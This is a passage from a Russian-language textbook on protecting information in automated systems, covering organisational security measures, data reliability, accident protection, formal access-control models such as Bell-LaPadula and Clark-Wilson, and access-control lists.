В большинстве исследований, посвященных проблемам защиты ин
формации, и в существующих публикациях основное внимание уделя-
лось либо правовому аспекту и связанным с ним социальным и законо-
дательным проблемам, либо техническим приемам решения специфиче-
ских проблем защиты. По сравнению с ними организационным вопро-
сам часто недоставало той четкой постановки, которая присуща техни-
ческим проблемам.
 мероприятия по защите информации, которые проводятся проек-
тировщиком, разработчиком и изготовителем в процессе создания
системы и рассчитаны на защиту от утечки информации в данной
организации;
 мероприятия, определенные в документации на систему, которые
касаются принципов организации защиты в системе на период
ввода и эксплуатации системы.
 Выполнение этих рекомендаций есть определенная гарантия за-
щиты ин формации в АС.
 введение на необходимых участках проведения работ режима
секретности;
81
 разработка должностных инструкций по обеспечению режима
секретности в соответствии с действующими в стране инструкци-
ями и положениями;
 выделение (при необходимости) отдельных помещений с охран-
ной сигнализацией и пропускной системой;
 разграничение задач по исполнителям и выпуску документации;
 присвоение грифа секретности материалам, документации, аппа-
ратуре и хранение их под охраной в отдельных помещениях с уче-
том и контролем доступа исполнителей;
 постоянный контроль соблюдения исполнителями установленного
режима и соответствующих инструкций;
 установление и распределение ответственных лиц за недопущение
утечки информации;
 другие меры, устанавливаемые главным конструктором при со-
здании конкретной системы.
В свою очередь организационные мероприятия должны быть опре-
делены в инструкции по эксплуатации на периоды подготовки и эксплу-
атации системы.
 при выделении территории, зданий и помещений обозначить кон-
тролируемую зону вокруг размещения комплекса средств автома-
тизации;
 установить и оборудовать охранную сигнализацию по границам
контролируемой зоны;
 создать контрольно-пропускную систему;
 определить схему размещения и места установки аппаратуры АС;
 проверить состояние системы жизнеобеспечения людей, условия
функционирования аппаратуры и хранения документации.
 перестройку структуры организации-потребителя в соответствии
с потребностями внедряемой системы; подобрать кадры для тех-
нического и оперативного обслуживания АС;
 при необходимости подобрать специальные кадры для работы по
защите информации в АС и создать централизованную службу
безопасности информации при руководстве организации-
потребителе АС;
 провести обучение кадров;
 организовать распределение функциональных обязанностей и от-
ветственности должностных лиц;
 установить полномочия должностных лиц по доступу к техниче-
ским средствам и информации АС;
82
 разработать должностные инструкции по выполнению функцио-
нальных обязанностей технического, оперативного состава долж-
ностных лиц, включая службу безопасности информации.
 постановку на учет аппаратуры, носителей информации и доку-
ментации;
 проверку отсутствия посторонней аппаратуры;
 контроль размещения аппаратуры в соответствии с требованиями
по разграничению доступа, побочного электромагнитного излуче-
ния и электрических наводок;
 проверку функционирования подсистемы контроля вскрытия тех-
нических устройств;
 проверку функционирования АС с помощью средств функцио-
нального контроля;
 проверку на отсутствие посторонних коммуникаций, выходящих
за пределы контролируемой зоны;
 проверку функционирования АС, включая систему защиты ин
формации, автономно и в составе АС по специальным программам
испытаний;
 тренировку оперативного состава должностных лиц, включая
службу безопасности информации, по специальным программам.
 периодические проверки полномочий лиц, работающих на АС,
допуск к обработке, хранению и передаче конфиденциальной ин-
формации только проверенных должностных лиц;
 назначение конкретных образцов технических средств для обра-
ботки ценной информации и дальнейшая работа только на них, ис-
ключение просмотра посторонними лицами содержания обраба-
тываемой информации за счет соответствующей установки дис-
плея, клавиатуры, принтера и т.п.;
 хранение магнитных носителей, жестких копий и регистрацион-
ных материалов в тщательно закрытых прочных шкафах (жела-
тельно в сейфах);
 постоянный контроль за работой устройств вывода секретной ин-
формации на материальный носитель;
 уничтожение (в установленном порядке) красящих лент, кассет,
дискет, бумаги и иных материалов, содержащих фрагменты цен-
ной информации;
 инспектирование правильности и полноты выполнения персона
лом мер по обеспечению сохранности необходимых дубликатов
файлов, библиотек программ, оборудования АС;
83
 надзор за дозволенностью изменений программ и оборудования;
 стимулирование персонала в вопросах обеспечения защиты;
 разработку и обеспечение всех противопожарных мероприятий и
обучение персонала действиям по тревоге и при стихийных бед-
ствиях;
 консультирование всех сотрудников, работающих с АС, по вопро-
сам обеспечения защиты информации.
Технические методы обеспечения информационной безопасности.
Технические методы обеспечения информационной безопасности
основаны на достижении, прежде всего физической безопасности, кото-
рая обеспечивается контролем физического доступа и безопасностью
зданий, комнат и средств. Реализация этих методов выполняется по сле-
дующим направлениям:
 Контроль физического доступа
 Безопасность офисов, комнат и средств
 Безопасность оборудования
 Месторасположение и защита оборудования
 Безопасность кабельной системы
 Безопасное уничтожение отработавшего оборудования
 Безопасность рабочего места
2.3.2. Программные средства обеспечения информационной

Для защиты персональных компьютеров используются различные
программные методы, которые значительно расширяют возможности по
обеспечению безопасности хранящейся информации. Среди стандарт-
ных защитных средств персонального компьютера наибольшее распро-
странение получили:
 средства защиты вычислительных ресурсов, использующие па-
рольную идентификацию и ограничивающие доступ несанкциони-
рованного пользователя;
 различные методов и средства шифрования данных, не зависящих
от контекста информации;
 средства защиты от копирования коммерческих программных
продуктов;
 средства защиты от компьютерных вирусов и создания архивов.
84
2.4. Организация защиты от случайных воздействий и
аварийных ситуаций
2.4.1. Защита информации от случайных воздействий
В целях защиты функционирования АС от случайных воздействий

применяются известные средства повышения надежности аппаратуры и
программного обеспечения АС, а для защиты информации - средства
повышения ее достоверности. Для предотвращения аварийной ситуации
применяются специальные меры.
Методы и средства повышения надежности вычислительных систем
и достоверности информации в настоящее время достаточно хорошо
разработаны.
Проблема надежности автоматизированных систем решается тремя
путями:
1. повышением надежности деталей и узлов;
2. построением надежных систем из менее надежных элементов
за счет структурной избыточности (дублирование, утроение
элементов, устройств, подсистем и т. п.);
3. применением функционального контроля с диагностикой от-
каза, увеличивающего надежность функционирования систе-
мы путем сокращения времени восстановления отказавшей
аппаратуры.
Перечисленное реализуется разработчиками АС, и широко описано
в литературе, посвященной вопросам разработки и эксплуатации средств
вычислительной техники.
Одним из основных условий эффективного функционирования ав-
томатизированной системы является обеспечение требуемого уровня до-
стоверности информации. Под достоверностью информации в АС бу-
дем понимать некоторую функцию вероятности ошибки, т. е. события,
заключающегося в том, что реальная информация в системе о некото-
ром параметре не совпадает в пределах заданной точности с истин-
ным значением.
Необходимая достоверность достигается использованием различ-
ных методов, реализация которых требует введения в системы обработ-
ки информации информационной, временной или структурной избыточ-
ности, Достоверность при обработке информации достигается путем
контроля и вы явления ошибок в исходных и выводимых данных, их ло-
кализации и исправления. Условие повышения достоверности - сниже-
ние доли ошибок до допустимого уровня. В конкретных АС требуемая
85
достоверность устанавливается с учетом нежелательных последствий, к
которым может привести возникшая ошибка, и тех затрат, которые
необходимы для ее предотвращения.
Методы контроля при обработке информации в АС можно класси-
фицировать по различным параметрам:
 по количеству операций, охватываемых контролем, - единичный
(одна операция), групповой (группа последовательных операций),
комплексный (контролируется, например, процесс сбора данных);
 по частоте контроля - непрерывный, циклический, периодический,
разовый, выборочный, по отклонениям;
 по времени контроля - до выполнения основных операций, одно-
временно с ними, в промежутках между основными операциями,
после них; по виду оборудования контроля - встроенный, контроль
с помощью дополнительных технических средств, безаппаратный;
 по уровню автоматизации - "ручной", автоматизированный, авто-
матический.
Различают системные, программные и аппаратные методы контроля
достоверности.
Системные методы направлены на:
 оптимизацию структуры обработки;
 поддержание характеристик оборудования в заданных пределах;
 создание оптимального числа копий и предысторий программ ис-
ходных и текущих данных;
 определение оптимальной величины пакетов данных и скор ости
первичной обработки, процедур доступа к массивам данных и др.
Программные методы повышения достоверности информации со-
стоят в том, что при составлении процедур обработки данных в них
предусматривают дополнительные операции, имеющие математическую
или логическую связь с алгоритмом обработки данных. Сравнение ре-
зультатов этих дополнительных операций с результатами обработки
данных позволяет установить с определенной вероятностью наличие или
отсутствие ошибок. На основании этого сравнения, как правило, появля-
ется возможность исправить обнаруженную ошибку.
Аппаратные методы контроля и обнаружения ошибок могут вы-
полнять практически те же функции, что и программные. Аппаратными
методами обнаруживают ошибки быстрее и ближе к месту их возникно-
вения, а также ошибки, недоступные для программных методов.
Все перечисленные методы контроля обработки данных базируются
на использовании определенной избыточности. При этом различают ме-
86
тоды контроля со структурной, временной и информационной избыточ-
ностью.
Структурная избыточность требует введения в состав АС допол-
ни тельных элементов (резервирование информационных массивов и
программных модулей, реализация одних и тех же функций различными
про граммами, схемный контроль в технических средствах АС и т. д.).
Временная избыточность связана с возможностью неоднократного
повторения определенного контролируемого этапа обработки данных.
Обычно этап обработки повторяют неоднократно, и результаты обра-
ботки сравнивают между собой. В случае обнаружения ошибки произ-
водят исправления и повторную обработку.
Информационная избыточность может быть естественной и искус-
ственной. Естественная информационная избыточность отражает объек-
тивно существующие связи между элементами обработки, наличие ко-
торых позволяет судить о достоверности информации. Искусственная
информационная избыточность характеризуется введением дополни-
тельных информационных разрядов в цифровом представлении обраба-
тываемых данных и дополнительных операций в процедуре их обработ-
ки, имеющих математическую или логическую связь с алгоритмом об-
работки данных. На основании анализа результатов дополнительных
операций и процедур обработки данных, а также дополнительных ин-
формационных разрядов выявляется наличие или отсутствие ошибок
определенного типа, а также возможности их исправления.
В зависимости от характера информации, особенностей алгоритмов
системы, а также от задач, стоящих перед ее адресатами, можно опреде-
лить следующие зависимости содержания информации от ошибок при ее
передаче:
смысловой объем информации в сообщении уменьшается пропор-
ционально числу искаженных разрядов в кодовой комбинации данного
сообщения;
искажение одного или нескольких разрядов приводит почти к пол
ной потере остальной части информации, содержащейся в смысловом
отрезке информации в сообщении.
Известно, что одна буква, цифра или символ представляются в вы-
числительных средствах одним байтом. Одно слово может в среднем за-
нимать от 1 до 20 букв. Каждой букве, цифре и символу присвоены дво-
ичные коды. Таблица кодов составлена так, что пропадание или появле-
ние одной единицы в разрядах приводит к замене одной буквы (символа,
цифры) на другую. При этом можно утверждать, что в этом случае имеет
87
место однократная ошибка, которая относительно легко обнаруживается
простыми средствами аппаратного контроля (например, контролем по
модулю 2).
В случае же появления двукратной ошибки в байте измениться мо-
гут два разряда. Контроль по модулю 2 этого не обнаруживает, что уже
может привести к незаметной замене одной буквы на другую. В различ-
ных языках существуют слова, которые меняют свой смысл на другой
при замене одной буквы другой. Это и есть модификация информации.
При трехкратной ошибке вероятность этого со бытия, естественно, уве-
личивается.
Для возникновения случайной утечки информации при ее обработ-
ке в вычислительной системе необходимо, чтобы в результате случай-
ных воздействий был перепутан адрес получателя или в правильный ад-
рес была выдана другая информация, для него не предназначенная. В
первом случае, например, заменилась одна из букв другой (модифика-
ция), во втором - адресация ячеек памяти ОЗУ, из которого считывалась
ин формация до ее передачи получателю (тоже модификация).
Анализ показывает, что вероятность разрушения информации от
случайных воздействий больше, чем ее модификации, а вероятность мо-
дификации информации больше вероятности ее утечки.
Проблема защиты информации в АС от случайных воздействий
наверное еще долго будет сохранять свою актуальность. Пока же на
уровне АС она решается косвенным путем за счет повышения надежно-
сти работы аппаратных средств и применения тестирующих программ.
Средствами, решающими непосредственно эту задачу, являются лишь
средства повышения достоверности информации при ее передаче по ка-
налам связи между удаленными объектами.
2.4.2. Защита информации от аварий
Защита информации от аварий заключается в создании средств пре-

дупреждения, контроля и организационных мер по исключению НСД на
комплексе средств автоматизации в условиях отказов его функциониро-
вания, отказов системы защиты информации, систем жизнеобеспечения
людей на объекте размещения и при возникновении стихийных бед-
ствий.
Практика показывает, что хотя аварийная ситуация - событие ред-
кое (вероятность ее появления зависит от многих причин, в том числе не
зависящих от человека, и эти причины могут быть взаимосвязаны), за-
щита от нее необходима, так как последствия в результате ее воздей-
88
ствия, как правило, могут оказаться весьма тяжелыми, а потери - безвоз-
вратными. Затраты на защиту от аварийных ситуаций могут быть отно-
сительно малы, а эффект в случае аварии - большим.
Отказ функционирования АС может повлечь за собой отказ систе-
мы защиты информации, может открыться доступ к ее носителям: маг-
нитным лентам, барабанам, дискам и т. д., что может привести к пред-
намеренному разрушению, хищению или подмене носителя. Несанкцио-
нированный доступ к внутреннему монтажу аппаратуры может привести
к подключению посторонней аппаратуры, разрушению или изменению
принципиальной электрической схемы.
Отказ системы жизнеобеспечения может привести к выводу из
строя обслуживающего и контролирующего персонала. Стихийные бед-
ствия: пожар, наводнение, землетрясение, удары молнии и т. д. - могут
также привести к указанным выше последствиям. Аварийная ситуация
может быть создана преднамеренно нарушителем. В последнем случае
применяются организационные мероприятия.
На случай отказа функционирования АС подсистема контроля
вскрытия аппаратуры снабжается автономным источником питания. Для
исключения безвозвратной потери информации носители информации
дублируются и хранятся в отдельном удаленном и безопасном месте.
Для защиты от утечки информация должна храниться в закрытом крип-
тографическим способом виде. В целях своевременного принятия мер по
защите системы жизнеобеспечения устанавливаются соответствующие
датчики, сигналы с которых поступают на централизованные системы
контроля и сигнализации.
Наиболее частой и типичной естественной угрозой является пожар.
Он может возникнуть по вине обслуживающего персонала, при отказе
аппаратуры, а также в результате стихийного бедствия.
2.5. Модели ограничения доступа и разделения привиле-

гий на доступ
Как показывает практика, наилучшие результаты в создании без-
опасных систем достигаются в том случае, когда разработчики системы
учитывают требования безопасности уже на этапе формулирования це-
лей разработки и самых общих принципов построения системы. Основ-
ную роль при этом играет так называемая модель управления доступом.
В англоязычной литературе для обозначения сходного понятия ис-
пользуются термины "security model (модель безопасности) и "security
89
policy model" (модель политики безопасности). Эта модель определяет
правила управления доступом к информации.
Целью построения модели управления доступом является опреде-
ление требований по безопасности АС. Для этого модель должна обла-
дать несколькими свойствами:
быть адекватной моделируемой системе и не избыточной;
быть простой и абстрактной, и поэтому несложной для понимания.
Модель должна позволять провести анализ свойств системы, но не
накладывать ограничений на реализацию тех или иных механизмов за-
щиты.
На сегодняшний день создан ряд типовых моделей управления до-
ступом, которые можно использовать при разработке системы.
2.6. Абстрактные модели управления доступа

Механизм управления доступом реализует на практике некоторую
абстрактную (или формальную) модель [12;18;20], определяющую пра-
вила задания разграничительной политики доступа к защищаемым ре-
сурсам и правила обработки запросов доступа к защищаемым ресурсам.
2.6.1. Модель Биба
Одной из первых моделей была опубликованная в 1977 модель

Биба (Biba). Согласно этой модели все субъекты и объекты предвари-
тельно разделяются по нескольким уровням доступа. Затем на их взаи-
модействия накладываются следующие ограничения:
 субъект не может вызывать на исполнение субъекты с более низ-
ким уровнем доступа;
 субъект не может модифицировать объекты с более высоким
уровнем доступа.
Эта модель очень напоминает ограничения, введенные в защи-
щенном режиме микропроцессоров Intel 80386+ относительно уровней
привилегий.
2.6.2. Модель Гогена-Мезигера
Модель Гогена-Мезигера (Goguen-Meseguer), представленная ими

в 1982 году, основана на теории автоматов. Согласно этой модели си-
стема может при каждом действии переходить из одного разрешенного
состояния только в несколько других. Субъекты и объекты в данной мо-
дели защиты разбиваются на группы — домены.
90
Переход системы из одного состояния в другое выполняется толь-
ко в соответствии с так называемой таблицей разрешений, в которой
указано, какие операции может выполнять субъект, например, из домена
С над объектом из домена D. В данной модели при переходе системы из
одного разрешенного состояния в другое используются транзакции, что
обеспечивает общую целостность системы. Это модель послужила от-
правной точкой для разработки политики безопасности в службе катало-
гов Active Directory Microsoft.
2.6.3. Сазерлендская модель
Сазерлендская (от англ. Sutherland) модель защиты, опубликован-

ная в 1986 году, основана на взаимодействии субъектов и потоков ин-
формации. Так же как и в предыдущей модели, здесь используется ма-
шина состояний со множеством разрешенных комбинаций состояний и
некоторым набором начальных позиций. В данной модели исследуется
поведение множественных композиций функций перехода из одного со-
стояния в другое.
2.6.4. Модель Кларка-Вильсона
Важную роль в теории защиты информации играет модель разгра-

ничения доступа Кларка-Вильсона (Clark-Wilson), опубликованная в
1987 году и модифицированная в 1989. Основана данная модель на по-
всеместном использовании транзакций и тщательном оформлении прав
доступа субъектов к объектам. В данной модели впервые исследована
защищенность третьей стороны — стороны, поддерживающей всю си-
стему безопасности. Эту роль в информационных системах обычно иг-
рает программа-супервизор.
Кроме того, в модели Кларка-Вильсона транзакции впервые были
построены по методу верификации, то есть идентификация субъекта
производилась не только перед выполнением команды от него, но и по-
вторно после выполнения. Это позволило снять проблему подмены
субъекта в момент между его идентификацией и собственно командой.
Модель Кларка-Вильсона считается одной из самых совершенных в от-
ношении поддержания целостности информационных систем.
2.7. Современные модели управления доступом

Рассмотрим модель матрицы доступа (Harrison, Ruzo Ullman, 1976).
Это частный случай реализации модели машины состояний. Состояния
91
безопасности системы представлены в виде таблицы, содержащей по
одной строке для каждого субъекта системы и по одной колонке для
каждого субъекта и объекта (табл.6). Каждое пересечение в массиве
определяет режим доступа данного субъекта к каждому объекту или
другому субъекту системы.
Более часто матрица доступа используется не как самостоятельная
модель управления доступом, а в качестве одной из нескольких пере-
менных состояния в более общей модели конечного автомата.
Другим способом описания управления доступом является модель,
выраженная в терминах меток безопасности, приписываемых субъектам
и объектам системы. Режим доступа, которым обладает субъект по от-
ношению к объекту, определяется при сравнении их меток безопасно-
сти, вместо того, чтобы искать соответствующее пересечение строки и
столбца в матрице доступа. Модель может использовать как матрицу до-
ступа, так и атрибуты безопасности. Все подобные модели, рассматри-
вающие доступ субъекта к объекту, могут быть названы моделями
управления доступом.
92
Таблица 6
Матрица доступа
Субъек- Объекты
ты O1 O2 O3 … OM
S1 R,W,D R - R,W
S2 R - - R
…
SN R,W R R R,W
Примечание: R – право чтения;

W – право записи;
D – право удаления.
Одна из первых моделей безопасности - и впоследствии наиболее
часто используемой - была разработана Дэвидом Беллом и Леонардо
ЛаПадула для моделирования работы компьютера и получила наимено-
вание модели Белл-ЛаПадула.
Кратко поясним суть этой модели. Для этого рассмотрим систему
из двух файлов и двух процессов (см. рис. 14). Один файл и один про-
цесс являются несекретными, другой файл и процесс - секретными.
Рис. 14. Процесс записи в модели Белл-ЛаПадула.

Простое правило безопасности предотвращает чтение секретного
файла несекретным процессом. Оба процесса могут читать и записывать
данные в несекретный файл. Однако, легко может произойти нарушение
правил управления доступом, если секретный процесс считает информа-
цию из секретного файла и запишет ее в несекретный файл. Это эквива-
лентно неавторизованному уменьшению класса доступа информации,
хотя при этом не изменяется класс доступа ни одного файла.
93
Когда процесс записывает информацию в файл, класс доступа кото-
рого меньше, чем класс доступа процесса, имеет место так называемый
процесс записи вниз. Ограничение, направленное на исключение нисхо-
дящей записи получило в модели Белл-ЛаПадула название свойства
ограничения. Таким образом, модель многоуровневой безопасности име-
ет два основных свойства:
простая безопасность: субъект может только читать объект, если
класс доступа субъекта доминирует под классом доступа объекта. Дру-
гими словами, субъект может читать "вниз", но не может читать "вверх";
свойство ограничения: субъект может только записать в объект, ес-
ли класс доступа субъекта доминируется классом доступа объекта.
Субъект может записывать "вверх", но не может записать "вниз".
Процесс не может ни читать объект с высшим классом доступа
(свойство простой безопасности), ни записать объект с низшим классом
доступа (свойство ограничения) (см. рис.15).
Рис. 15. Демонстрация нарушения свойства простой безопасности

При формализации многоуровневого управления безопасностью,
модель Белл-ЛаПадула определяет структуру класса доступа и устанав-
ливает упорядочивание отношений между классами доступа (доминиро-
вание). Кроме того, определяются два уникальных класса доступа:
SYSTEM HIGH, который доминирует над всеми остальными классами
94
доступа, и SYSTEM LOW, который доминируется всеми другими клас-
сами. Изменения классов доступа в рамках модели Белл-ЛаПадула не
допускаются.
Управление доступом в модели Белл-ЛаПадула происходит как с
использованием матрицы управления доступом, так и с использованием
меток безопасности и ранее приведенных правила простой безопасности
и свойства ограничения. В дополнение к имеющимся режимам доступа
чтения и записи матрица управления доступом включает режимы добав-
ления, исполнения и управления - причем последний определяет, может
ли субъект передавать другим субъектам права доступа, которыми он
обладает по отношению к объекту.
Управление при помощи меток безопасности усиливает ограниче-
ние предоставляемого доступа на основе сравнения атрибутов класса
доступа субъектов и объектов.
В модели Белл-ЛаПадула определено около двадцати функции
(правил операций), выполняемых при модификации компонентов мат-
рицы доступа, при запросе и получении доступа к объекту (например,
при открытии файла), создании и удалении объектов: при этом для каж-
дой функции доказывается сохранение ею, в соответствии с определени-
ем, безопасного состояния. Лишь немногие разработки безопасных си-
стем использовали функции, предложенные Белл и ЛаПадула, чаще ис-
пользовались собственные функции, разработанные на основе функций
модели Белл-ЛаПадула. Поэтому в настоящее время, когда говорят о
модели Белл-ЛаПадула, имеются в виду только простое условие без-
опасности и свойство ограничения, а не функции, составляющие основу
модели, и их доказательства.
Помимо выполнения основной своей задачи - математически точно-
го представления требований правил управления доступом, модель
управления доступом используется в процессе разработки системы для
выполнения так называемого анализа информационного потока. Анализ
информационного потока - это общая технология для анализа путей утеч-
ки информации в системе; она применима к любой модели безопасности.
2.8. Системы разграничения доступа

Основную роль в обеспечении внутренней безопасности АС выпол-
няют системы управления доступом (разграничения доступа) субъектов
к объектам доступа, реализующие концепцию единого диспетчера до-
ступа (в английском варианте "reference monitor"- дословно, монитор
ссылок).
95
Сущность концепции диспетчера доступа состоит в том, что неко-
торый абстрактный механизм является посредником при всех обращени-
ях субъектов к объектам (см. рис.16).
Диспетчер доступа должен выполнять следующие функции:
 проверять права доступа каждого субъекта к любому объекту на
основании информации, содержащейся в базе данных защиты
(правил разграничения доступа);
 при необходимости регистрировать факт доступа и его параметры
в системном журнале.
Рис. 16. Система разграничения доступа

Основными требованиями к реализации диспетчера доступа явля-
ются:
 требование полноты контролируемых операций, согласно которо-
му, проверке должны подвергаться все операции всех субъектов
над всеми объектами системы. Обход диспетчера предполагается
невозможным;
 требование изолированности, то есть защищенности диспетчера от
возможных изменений субъектами доступа с целью влияния на
процесс его функционирования;
 требование формальной проверки правильности функционирова-
ния;
 минимизация используемых диспетчером ресурсов
В самом общем виде работа средств управления доступом субъек-
тов к объектам основана на проверке сведений, хранимых в базе данных
защиты.
96
Под базой данных защиты (security database) понимают базу дан-
ных, хранящую информацию о правах доступа субъектов системы к
объектам и другим субъектам.
Для внесения изменений в базу данных защиты система разграни-
чения доступа должна включать средства для привилегированного поль-
зователя (администратора безопасности) по ведению этой базы. Такие
средства управления доступом должны обеспечивать возможность вы-
полнения следующих операций:
 добавления и удаления объектов и субъектов;
 просмотра и изменения соответствующих прав доступа субъектов
к объектам.
Форма представления базы данных защиты может быть различной.
Основу базы данных защиты в общем случае составляет матрица досту-
па или ее представления (см. табл.6). Каждый элемент этой матрицы
представляет собой кортеж, определяющий права доступа (для всех воз-
можных видов доступа) каждого субъекта к каждому объекту или дру-
гому субъекту.
Сложность управления доступом (ведения матрицы доступа) в ре-
альных системах связана не только с большой размерностью матрицы
(большим числом субъектов и объектов) и высоким динамизмом ее кор-
ректировки, но и с необходимостью постоянного отслеживания при та-
ких корректировках большого числа зависимостей между значениями
определенных кортежей. Наличие таких зависимостей связано с объек-
тивно существующими в предметной области ограничениями и прави-
лами наследования полномочий в иерархии объектов и субъектов.
Например, пользователь должен наследовать полномочия группы поль-
зователей, в которую он входит; права доступа некоторого пользователя
к каталогам и файлам не должны превышать соответствующие его права
по доступу к диску, на котором они размещены и т.п.
При полномочном управлении доступом (категорирование объектов
и субъектов и введение ограничений по доступу установленных катего-
рий субъектов к объектам различных категорий) на матрицу доступа
накладываются дополнительные зависимости между значениями прав
доступа субъектов.
Существующие ограничения и зависимости между полномочиями
существенно усложняют процедуры ведения матриц доступа. Это при-
вело к возникновению большого числа способов неявного задания мат-
рицы (списки доступа, перечисление полномочий, атрибутная схема и
т.п.).
97
Основные показатели оценки эффективности различных способов
неявного задания следующие:
 затраты памяти на хранение образа матрицы доступа,
 время на выборку (вычисление) значений полномочий (элементов
кортежей);
 удобство ведения матрицы при наличии ограничений и зависимо-
стей между значениями ее кортежей (простота и, наглядность, ко-
личество требуемых операций при добавлении/удалении субъекта
или объекта, назначении/модификации полномочий и т.п.).
Рассмотрим основные способы неявного задания матрицы доступа.
2.8.1. Списки управления доступом к объекту
В данной схеме полномочия доступа к объекту представляются в

виде списков (цепочек) кортежей для всех субъектов, имеющих доступ к
данному объекту. Это равносильно представлению матрицы по столб-
цам с исключением кортежей, имеющих все нулевые значения.
Такое представление матрицы доступа получило название "списка
управления доступом" (access control list). Этот вид задания матрицы ре-
ализован в сетевой ОС Novell Netware.
Достоинства:
экономия памяти, так как матрица доступа обычно сильно разрежена
удобство получения сведений о субъектах, имеющих какой либо
вид доступа к заданному объекту;
Недостатки:
неудобство отслеживания ограничений и зависимостей по наследо-
ванию полномочий субъектов
неудобство получения сведений об объектах, к которым имеет ка-
кой-либо вид доступа данный субъект;
так как списки управления доступом связаны с объектом, то при
удалении субъекта возможно возникновение ситуации, при которой объ-
ект может быть доступен несуществующему субъекту.
2.8.2. Списки полномочий субъектов
В данной модели полномочия доступа субъекта представляются в

виде списков (цепочек) кортежей для всех объектов, к которым он имеет
доступ (любого вида). Это равносильно представлению матрицы по
строкам с исключением кортежей, имеющих нулевые значения.
98
Такое представление матрицы доступа называется "профилем"
(profile) субъекта.
В системах с большим количеством объектов профили могут иметь
большие размеры и, вследствие этого, ими трудно управлять; изменение
профилей нескольких субъектов может потребовать большого количе-
ства операций и привести к трудностям в работе системы. Поэтому про-
фили обычно используются лишь администраторами безопасности для
контроля работы субъектов, и даже такое их применение весьма ограни-
чено.
Достоинства:
экономия памяти, так как матрица доступа обычно сильно разрежена;
удобство получения сведений об объектах, к которым имеет какой
либо вид доступа данный субъект;
неудобство отслеживания ограничений и зависимостей по наследо-
ванию полномочий доступа к объектам;
неудобство получения сведений о субъектах, имеющих какой либо
вид доступа к заданному объекту;
так как списки управления доступом связаны с субъектом, то при
удалении объекта возможно возникновение ситуации, при которой субъ-
ект может иметь права на доступ к несуществующему объекту.
2.8.3. Атрибутные схемы
Так называемые атрибутные способы задания матрицы доступа ос-

нованы на присвоении субъектам и/или объектам определенных меток,
содержащих значения атрибутов.
Наиболее известным примером неявного задания матрицы доступа
является реализация атрибутной схемы в операционной системе Unix.
Основными достоинствами этих схем являются:
экономия памяти, так как элементы матрицы не хранятся, а дина-
мически вычисляются при попытке доступа для конкретной пары субъ-
ект-объект на основе их меток или атрибутов;
удобство корректировки базы данных защиты, то есть модификации
меток и атрибутов;
удобство отслеживания ограничений и зависимостей по наследова-
нию полномочий субъектов, так как они в явном виде не хранятся, а
формируются динамически;
отсутствие потенциальной противоречивости.
99
затраты времени на динамическое вычисление значений элементов
матрицы при каждом обращении любого субъекта к любому объекту;
при атрибутной схеме затруднено задание прав доступа конкретно-
го субъекта к конкретному объекту.
2.9. Управление механизмами разграничения доступа

Опыт внедрения и сопровождения систем разграничения доступа в
различных организациях позволяет указать на ряд типовых проблем,
возникающих при установке, вводе в строй и эксплуатации средств раз-
граничения доступа к ресурсам АС, а также предложить подходы к ре-
шению этих проблем.
В большинстве случаев установка средств защиты производится на
реально функционирующие АС. Защищаемая АС используется для ре-
шения важных прикладных задач, часто в непрерывном технологическом
цикле, и ее руководители и пользователи крайне негативно относятся к
любому, даже кратковременному, перерыву в ее функционировании для
установки и настройки средств защиты или частичной потере работоспо-
собности АС вследствие некорректной работы средств защиты.
Внедрение средств защиты осложняется еще и тем, что правильно
настроить данные средства с первого раза обычно не представляется
возможным. Это, как правило, связано с отсутствием у заказчика полно-
го детального списка всех подлежащих защите аппаратных, программ-
ных и информационных ресурсов системы и готового непротиворечиво-
го перечня прав и полномочий каждого пользователя АС по доступу к
ресурсам системы.
Поэтому, этап внедрения средств защиты информации обязательно
в той или иной мере включает действия по первоначальному выявлению,
итеративному уточнению и соответствующему изменению настроек
средств защиты. Эти действия должны проходить для владельцев и
пользователей системы как можно менее болезненно.
Очевидно, что те же самые действия неоднократно придется повто-
рять администратору безопасности и на этапе эксплуатации системы
каждый раз при изменениях состава технических средств, программного
обеспечения, персонала и пользователей и т.д. Такие изменения проис-
ходят довольно часто, поэтому средства управления системы защиты
должны обеспечивать удобство осуществления необходимых при этом
изменений настроек системы защиты.
100
Для поддержки и упрощения действий по настройке средств защи-
ты в системе защиты необходимо предусмотреть следующие возможно-
сти:
выборочное подключение имеющихся защитных механизмов, что
обеспечивает возможность реализации режима постепенного поэтапного
усиления степени защищенности АС;
так называемый “мягкий” режим функционирования средств защи-
ты, при котором несанкционированные действия пользователей (дей-
ствия с превышением полномочий) фиксируются в системном журнале
обычным порядком, но не пресекаются (не запрещаются системой защи-
ты). Этот режим позволяет выявлять некорректности настроек средств
защиты (и затем производить соответствующие их корректировки) без
нарушения работоспособности АС и существующей технологии обра-
ботки информации;
возможности по автоматизированному изменению полномочий
пользователя с учетом информации, накопленной в системных журналах
(при работе, как в "мягком", так и обычном режимах).
Увеличение количества рабочих станций и использование новых
программных средств, включающих большое количество разнообразных
программ (например, MS Windows), приводит к существенному увели-
чению объема системных журналов регистрации событий, накапливае-
мых системой защиты. Объем зарегистрированной информации стано-
вится настолько велик, что администратор уже физически не может
полностью проанализировать все системные журналы за приемлемое
время.
Для облегчения работы администратора с системными журналами в
системе должны быть предусмотрены следующие возможности:
подсистема реализации запросов, позволяющая выбирать из со-
бранных системных журналов данные об определенных событиях (по
имени пользователя, дате, времени происшедшего события, категории
происшедшего события и т.п.). Естественно, такая подсистема должна
опираться на системный механизм обеспечения единого времени собы-
тий;
возможность автоматического разбиения и хранения системных
журналов по месяцам и дням в пределах заданного количества послед-
них дней. Причем во избежание переполнения дисков по истечении
установленного количества дней просроченные журналы, если их не
удалил администратор, должны автоматически уничтожаться;
101
желательно также иметь в системе средства автоматической подго-
товки отчетных документов установленной формы о работе станций се-
ти и имевших место нарушениях. Такие средства позволили бы суще-
ственно снять рутинную нагрузку с администрации безопасности.
2.9.1. Ограничение доступа
Ограничение доступа заключается в создании некоторой физиче-

ской замкнутой преграды вокруг объекта защиты с организацией кон-
тролируемого доступа лиц, связанных с объектом защиты по своим
функциональным обязанностям.
Ограничение доступа к комплексам средств автоматизации (АС)
обработки информации заключается:
 в выделении специальной территории для размещения АС;
 в сооружении по периметру зоны специальных ограждений с
охранной сигнализацией;
 в сооружении специальных зданий или других сооружений;
 в выделении специальных помещений в здании;
 в создании контрольно-пропускного режима на территории, в зда-
ниях и помещениях.
Задача средств ограничения доступа - исключить случайный и
преднамеренный доступ посторонних лиц на территорию размещения
АС и непосредственно к аппаратуре. В указанных целях создается за-
щитный контур, замыкаемый двумя видами преград: физической и кон-
трольно-пропускной. Такие преграды часто называют системой охран-
ной сигнализации и системой контроля доступа.
